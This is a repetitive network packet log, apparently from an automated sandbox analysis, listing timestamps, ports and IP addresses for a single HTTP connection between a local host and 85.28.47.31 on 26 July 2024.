Jul 26, 2024 20:09:13.615354061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615354061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615370035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615386009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615394115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615400076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615415096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615420103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615428925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615447044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615462065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615463018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615478039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615492105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615504980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615506887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615521908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615530968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615536928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615551949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615560055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615566015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615581036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615586996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615596056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615608931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615652084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616364956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616379976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616403103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616409063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616417885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616430998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616446018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616461039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616466045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616475105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616498947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616501093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616516113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616518974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616529942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616543055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616554022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616570950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616579056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616585016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616600037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616614103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616619110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616628885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616643906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616643906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616660118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616672039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616676092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616691113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.616699934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.616725922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617259979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617276907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617310047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617345095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617350101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617363930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617379904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617394924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617400885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617414951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617415905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617441893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617485046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617610931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617625952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617640018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617655039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617659092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617669106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617685080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617697001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617698908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617712975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617728949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617733002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617743969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617758989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617762089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617774010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617784977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617789030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617805004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617814064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617819071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.617844105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.617862940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618351936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618366957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618381977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618396997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618402958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618443012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618493080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618509054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618524075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618535995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618539095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618555069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618571997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618580103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618618011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618813038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618829012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618844986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618856907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618859053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618875027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.618899107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.618935108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619015932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619031906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619046926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619059086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619087934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619271994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619287014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619302034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619316101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619316101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619332075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619347095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619357109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619362116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619376898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619395971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619404078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619410992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619426966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619445086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619466066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619703054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619718075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619745970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619781017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619940042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619963884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619980097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.619987965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.619995117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620007038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620011091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620028019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620029926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620043039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620055914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620058060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620073080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620088100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620096922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620101929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620116949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620124102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620131969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620146036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620153904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620161057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620176077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620192051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620197058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620207071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620235920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620260000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620702028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620719910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620734930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620759964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620779037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620837927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620853901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620867968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.620882034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620922089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.620997906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621012926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621027946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621042967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621046066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621057987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621073961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621083021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621089935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621121883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621145010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621361971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621376991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621392012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621406078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621407032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621422052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621437073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621438026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621469021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621478081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621484995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621500015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621510029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621515036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621529102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621543884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621560097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621568918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621577024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621592999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.621613979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.621637106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622214079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622229099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622242928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622255087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622270107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622283936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622284889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622298956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622314930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622327089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622328997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622344971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622353077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622359991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622375011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622380018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622389078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622404099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622420073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622427940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622436047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622451067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622466087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622479916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622483969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622495890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622509956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.622517109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622539997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.622565985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623086929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623102903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623117924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623132944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623141050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623148918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623158932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623163939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623182058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623209953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623236895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623420000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623442888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623460054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623471022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623475075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623482943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623495102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623497963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623514891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623517990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623531103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623547077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.623560905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623584986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.623981953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624005079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624018908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624027967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624033928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624048948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624063969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624068975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624078989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624094009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624108076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624113083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624123096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624133110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624138117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624152899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624167919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624171972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624181986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624192953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624197006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624212980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624222040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624228954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624243021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624245882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624264956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624308109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624342918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.624957085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624979973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.624995947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625005007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625010014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625024080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625025034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625041008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625055075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625057936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625070095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625085115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625099897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625108957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625114918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625128984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625133038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625145912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625158072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625164032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625179052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625181913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625194073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625206947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625219107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625236034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625247955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625253916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625267982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625287056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625314951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.625957012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625982046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.625997066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626004934 CEST	49704	80	192.168.2.5	85.28.47.31
